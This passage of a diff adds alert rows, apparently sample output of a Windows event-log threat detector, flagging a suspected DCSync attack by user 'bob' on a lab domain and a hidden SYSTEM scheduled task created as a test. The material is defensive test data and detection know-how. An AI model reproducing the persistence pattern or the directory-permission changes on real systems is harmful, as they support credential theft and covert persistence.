07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14675</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
+    </TimeCreated>
+    <EventRecordID>198242599</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">77B63738-C25C-4FBD-BA96-A7ABE17A22A3</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14674</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
+    </TimeCreated>
+    <EventRecordID>198242598</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">77B63738-C25C-4FBD-BA96-A7ABE17A22A3</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14675</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+schedule task updated,1599047269.966623,2020-09-02T15:47:49.966623+04:00,,Audit,Low,schedule task updated by user,4702,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4702</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12804</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-09-02T11:47:48.959767Z"">
+    </TimeCreated>
+    <EventRecordID>2171293</EventRecordID>
+    <Correlation ActivityID=""4F7FBBE3-7BB5-0002-EBBB-7F4FB57BD601"">
+    </Correlation>
+    <Execution ProcessID=""632"" ThreadID=""4244"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-308926384-506822093-3341789130-1106</Data>
+    <Data Name=""SubjectUserName"">a-jbrown</Data>
+    <Data Name=""SubjectDomainName"">3B</Data>
+    <Data Name=""SubjectLogonId"">0x21a8c68</Data>
+    <Data Name=""TaskName"">\LMST</Data>
+    <Data Name=""TaskContentNew"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt; 
+&lt;Task version=&quot;1.2&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt; 
+  &lt;RegistrationInfo&gt; 
+    &lt;Date&gt;2020-09-02T04:47:49.74-07:00&lt;/Date&gt; 
+    &lt;Author&gt;a-jbrown&lt;/Author&gt; 
+    &lt;Description&gt;00304d6e&lt;/Description&gt; 
+    &lt;URI&gt;\LMST&lt;/URI&gt; 
+  &lt;/RegistrationInfo&gt; 
+  &lt;Triggers&gt; 
+    &lt;TimeTrigger&gt; 
+      &lt;StartBoundary&gt;2020-02-09T04:47:48&lt;/StartBoundary&gt; 
+      &lt;EndBoundary&gt;2020-02-09T04:47:58&lt;/EndBoundary&gt; 
+      &lt;Enabled&gt;true&lt;/Enabled&gt; 
+    &lt;/TimeTrigger&gt; 
+  &lt;/Triggers&gt; 
+  &lt;Principals&gt; 
+    &lt;Principal id=&quot;Author&quot;&gt; 
+      &lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt; 
+      &lt;UserId&gt;SYSTEM&lt;/UserId&gt; 
+    &lt;/Principal&gt; 
+  &lt;/Principals&gt; 
+  &lt;Settings&gt; 
+    &lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt; 
+    &lt;DisallowStartIfOnBatteries&gt;true&lt;/DisallowStartIfOnBatteries&gt; 
+    &lt;StopIfGoingOnBatteries&gt;true&lt;/StopIfGoingOnBatteries&gt; 
+    &lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt; 
+    &lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt; 
+    &lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt; 
+    &lt;IdleSettings&gt; 
+      &lt;Duration&gt;PT10M&lt;/Duration&gt; 
+      &lt;WaitTimeout&gt;PT1H&lt;/WaitTimeout&gt; 
+      &lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt; 
+      &lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt; 
+    &lt;/IdleSettings&gt; 
+    &lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt; 
+    &lt;Enabled&gt;true&lt;/Enabled&gt; 
+    &lt;Hidden&gt;true&lt;/Hidden&gt; 
+    &lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt; 
+    &lt;WakeToRun&gt;false&lt;/WakeToRun&gt; 
+    &lt;ExecutionTimeLimit&gt;PT72H&lt;/ExecutionTimeLimit&gt; 
+    &lt;Priority&gt;7&lt;/Priority&gt; 
+  &lt;/Settings&gt; 
+  &lt;Actions Context=&quot;Author&quot;&gt; 
+    &lt;Exec&gt; 
+      &lt;Command&gt;cmd.exe&lt;/Command&gt; 
+      &lt;Arguments&gt;/c echo testing &amp;gt; c:\users\public\out.txt&lt;/Arguments&gt; 
+    &lt;/Exec&gt; 
+  &lt;/Actions&gt; 
+&lt;/Task&gt;</Data>
+  </EventData>
+</Event>",01566s-win16-ir.threebeesco.com,Security
+Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.025627Z"">
+    </TimeCreated>
+    <EventRecordID>198242597</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">30F197FC-BECA-48D6-923E-A52A437119D3</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14674</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.025627,2019-03-26T01:28:45.025627+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.024634Z"">
+    </TimeCreated>
+    <EventRecordID>198242596</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""896"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">30F197FC-BECA-48D6-923E-A52A437119D3</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
